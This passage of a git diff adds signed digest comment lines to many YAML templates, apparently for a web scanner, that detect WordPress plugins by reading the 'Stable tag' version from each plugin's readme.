'(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205e5a137a6501d2bf1e4ac9ed4eb8212d7ef1c14dcf741431331230750ca7e0e5022100eaf8925ef8a456a64b8cbbc7cdcbc37de611d301c3ff6e892a49f838b6613bad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..06c2e3a99f 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008db1b50efb02b215554eb7b329dcd126b16fe98f4f1ead0a27df15326bafaf2d02200c48e83f1bfa853f64505af85a4541a30b19ba284e05308d4f15d9b204889449:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..9823bddf5f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200e3c7f595487fbcf1e24fbb4479a699f930b702cfb7043f9934633d9176526010220483612aafe15c6bd5640a52a7dc5be1314d176ae984923e331a1d2a3437e69bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index d94b4228a9..479bd366c5 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210085bb54885a3c648b3dedc6c663b1bd0d78cfa1a0d368106b989de3ecb3a300a9022100aad01a7379643668cd5c1aff8491b855de106378303241440103ef5a8211f958:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..e2e53c61a5 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022014efa8d944c7f028f0761698013511be82d9f247cc0e0a6ffecfe2f465d8827b02204c7b11b1b115fed7e17474f5739e91e2aced62903da0ff678ef7942454d21912:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index 1b4769d0a7..daff3429ef 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207e96feae7ca7397658738c3af0e68a5380e9c13fdb8ab0ee1361dabaf6a83f72022100b8429e89fa147da8ba57e9c8e6d7cf5910863ca285cd8d1bc0cdca6b3c2ae683:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index c2cd4ede1b..9fa1eaf3c5 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210092716d95942b11f1fa494b21eaec2867f27de061f8f3f7e5446f212ea03fe58702200d46933f65001d0ee04b2dab16c662366a36955204917dc33e8d3ed648bfbdaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 03e6c13ec5..6e2a60a10b 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206a8acdc8026226ae061c4472e3f041344239d6e3e85a2555638fafdd7107b632022100aafe8dc24c92d0a3ad7e9a0c2356ff67362b0215f8d7cf0c41ca3e686480d81f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..86440c1822 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c28c39f245f1d7e51d105c75b4d6194599adf728b77743c8da44016cb2a6bdc10220391ecbd62a81f4cf09feae302e171c932fa23aa5e32ee6b27f0776a9d8ca8d38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 846761f2f7..a4dfc0bcac 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210082a1b56556e47f3d639c7498071f83e2f803bbac3b90a4d40debbe419d37600a0220276a63d9f07865d80b1fd1333996d36196aa8d1189d4bdf1cfda924003b73779:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..5453c8cf58 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ad829bde75812a5247abb3e748ae83b6d500e40783f53114441724468fd8d50c022002afe7999062b3c564c87d7c440e47f84ed3e45478e0655318fe50b508a370f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..b9a03406a9 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c479143efe42f4bf7ea26867b5a8bad2faad0fd2de589c1e980b6abd1d3c5b9b0221008137d8ac0d5abad8912375039347cd27260138fb4f7e32113fe10cd7bcce31af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..ef589bc125 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100df7c0aeb1645f2ed48b8bc57a48c79aa7e5d591044f94ca6f36fd50994fce24c022100ebd0d905f9911a4e4b48b417e0bb94ed8ba1a060155af07fa562f5f1da579998:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..7e28f5c323 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b531c487daf427dee07fe3abc1b39712a3e3853025adeaf51a8a02be4444a9fd022038752ad29402c167f3bf973fb831c045b6b7fe89961147f3363b9dc07a190223:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..bf0157d292 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c98d8603bf1551a7929951975654f24707dc2dbac0a52ae79b8ea64d1987989b022100eb6877319c828fe5ae313f2243edb59568400bdc629657e845bfb2952c28e22f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index d74de07e8e..53c93b7d79 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c9ef5c5a40525cf9543335c4a1359f89987b929ad634e120f5946a34ce8ae285022100fda57c0b93eda5c506d0b34bc808e71e0fba3c5bcf6c553767c055510368f226:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index e5cfe47925..f0dcb2d5e3 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e121bc6579c4c45b18a188437c7a70566064d082295e93ccb7cb0b2fcf7c9f45022100b878be783b44b48a3eafeab93778f5f0be3641c72389f5090817b7c9e682cca4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..d31330353b 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fd12c760c7c5f1b84dba3d7fdcd47748e319f2c163fee5319252564adc13cee40221008704543d223abf44ad885da252b3c9936f189a7a3947c137cbe9b418f9ab9e9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index a1616c1741..56e09bd029 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205ff923e282e3f5dbb46110c61d8e6258fbf42118937dfbbbc5f1adbf35bbead0022100b526c832757d9d6d22e1312436bba5d6b34bc41173f4c2888af8a5b26ff55081:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..93bd1e06de 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e2e7b5565f2b92811350f5cce6f0b2e2631076ac8c6ea17f5bfddbbb1e56aea0022038e4ea6ecc6cba3cb08b5852eb5d713daf1df24dc1145251155cd71704ba5af9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..5d5111f40e 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022047b277e8a68a8b74ed748dbd516493fb92d9cea450b85ed76e442688509e238002207e2c574e0b9e45c2e30601944731e957c97d0484bf666e96e5a91477b5c928f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..7ba7971a5c 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204e08a6b172c4cb2c6e9007617dcec27a2fd5ecf688db4a31440fceadc7e80030022100c976162f868b91e85d070a327cb564dc1216137e93d93a98b3e3691f140656c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..7fe31e27f3 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022050272ba9701f896cc557248326657e57fcbd66c9d1b03496d4a9206da46aa51c022100910a49a6d3217fbca3d1680d5f5c3332d3bb552ceaf18c0e7b54eca3bfd40782:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index d86e0557ae..dca269b00a 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a4d51f7577a72d48a9820e174384f7a638530926c44333554878b78af37780cb02202522edb27ec8fc966c6783529f7e9c42013f832654594d274c380371a348f73c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..e013b773a7 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b5d857914084f4f54888109ee833bcbea71ac393cf61fc65e30eafdf52713365022100c817562f748d3ec0077436eee847f73431404f961df08afed642550f6b65c3c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 4ae34395fa..7210e18c90 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a21dfa2d4839d0bc2dbcce7779bc9e204faaea449923f7c581c0af91e73403de0220505a4a071757c9e9943395b090719d9c48063e3e0ac93705b9e6210b586abc8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..f8398ab77a 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022074a709b836893821bac042a4a41339073a90e6ea0e3932c4e50c5691b50f10ca02205a67bb219dc670293bbaa013f2c1a568482fb3c81d6a7bf43379a2a7d9ef2239:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..a980482c2d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206910e237fa250a88a679cd7e6c7b9f975f2d4c4921e28d044cdb769b98534e890221009fa9300a10f479d2019279807c302ce7398c737cf5920b2972f2ee3eff5b6c5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..9e0ccd5a65 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c3ca3c29f5ffa73203f1537e927563bcebbe45e281ad800edf2f69937f105c39022100e6b7b0cd638908a40a1328fae33c4ed02e7fe45aa994bd1b6f14f8dc8f4b312e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index aa36122d85..caacfb333d 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a9b0691206a53f01b0afd4210926a11717ecc22d11bf1c42074aa9c9c07034a40221009470ce7a23f21f6bbfb911d8504fad2a7cb451019c829e706ddfbaa9c01ad911:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..1461662487 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d030ab25652d01d5aeee2b4bc5d76bb481aa34fc159fd2b8a01ce68031b53ada022100905bca5128ae8c365c68959ca6fba479f30283d240f5f9fbc3da1f0f2bd0a09f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..4166d8c09c 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c5c30e6fc79bc8f1bdcc448653fb4f911d1959f3031e1a85f3921ac7e7411fbb022100fca3ca6978bce002504928f42e203705a11580db5cdf97e9d9ff9b5e975795ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1d00a5705d..3442b04140 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200a46b1801e01b7d29e2a4db2aa5f587dd5211079578d5d0e6880b89e20c3ba9d022041c9b474f24c5650b5b3ccc0b49fe3883d3e1b29a2446e4df0762f16fb7314af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..87c8d622e0 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201cce41a487194d88d73f6554054ba5181e4aeba6d6ce27651fddbba8d590a620022100d0607cb66c7d3deb82d3e039c72da752e4efc56b1b533df7fb07240f5c1682a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..6206059f59 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220229812433cd7874f153be85c04374e4d428f27904ad92c34af7f8650503c0aa902207ede805eb9dd744fe430808b745ddb73e3f210c89179f81003f069c16966e984:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 3dbb03067b..31c0dc1a1e 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220343287f81e577d7e5c9baed2d600057d936890b7513e7293b2ce94418c3e26bd02205762d66b437ff462fa80c415c2a5e2cbec5248507fa78001ddde6ff0bf27e32a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 7ed171d662..7f0ac4e443 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201cf605f8fc76955378c66455616b494e0192bd9bd830a4b0596babae3d2f3773022009afeed722fecd988cd7a3c87c8c675d2022fac9167d330c9ea90a15e99f5d13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..a91be1290d 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f3227e966337c01c073393d88ed993dd6b7a7f2c59f8da489f98c617f2fe4bae022100df4a30b3af363d2f84d6973f7c7995cd0a4cf82a6318fc61d0da4da0426f8606:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 7161671960..f0be38fc55 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c3317c43923a03cb84145f14e47dd2926385cc5e7232cf6f7cb0eaf0e9f855da022100ae0b72e146871ed04e3fc02322c4a6e3c962d1519fdae40d34ffcd6202bf8d7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..2c4a03bcf7 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210080619cbc37369e98fc8695ca7467868d6a48d734ce477ad7cfe559193de53a6a022038d7c327beaac2499fd2e30db452ac16a5840b3d42019fa92bba67d5a967426a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..68d2a1a26c 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022047fcc88d3da313a9673cd63e2cd365300017fc3ec02846ccca6333227f14db9c022100f2564d5ecbfbc2fbedd6635cf79a8d93734bbb5aa72dca054e283d15fea08718:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..59cf690ea2 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100aee69066b5f6b597d9cc70574a5b02710a5d09e171b9ddfb0bb4a7e8744c7a78022100c11e9c78a22074a97f017c70eca3180c2584d38b926ca600a56df479a024423d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..d4b7e8bf2e 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220729cd6617b0b9a58575270e36cf167cc297961e71aa688719ef73c2d89fe6b9d022068d8a141f6cefb5ab5bc21839a4dd6672fa0af53b1746c4071d3b917c686c6cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..3f53a2b2a4 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b8597188b8bfffaddb0eb824e06e098bf57624f58fb935185f1ce90282f467c802210092e56ea370a342d131a874229a5f682ebd4c9abf672638cdaa93e2bf69e3845e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..50e0f5d8ea 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a77f84d600f4cbac3db2095a904065a56da152c4619c834abd8d08936b792618022100fa8fe5904d929c272d90f961fdbecec82cee14948e1354c3078bdef250cb05d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..e5f1a1e880 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d60cbbe15c8f1055deb72d96660e8d3387ba4e022c5fd628b8a37e8200cdbbb9022028c80a3cb7e6fc48d87956387fce789b40a3f06863d7435772220ae8b964282a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..14fcfe61a2 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c7ae9a80417b8ab0f2d0a558652dbf5f7ba35eaf7f7655cb0c29b868cea601a9022053597f005a373aa67897eb299a5a8247548952b043c7e5224443056fa0c8c4f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..e7b34ee187 100644 --- 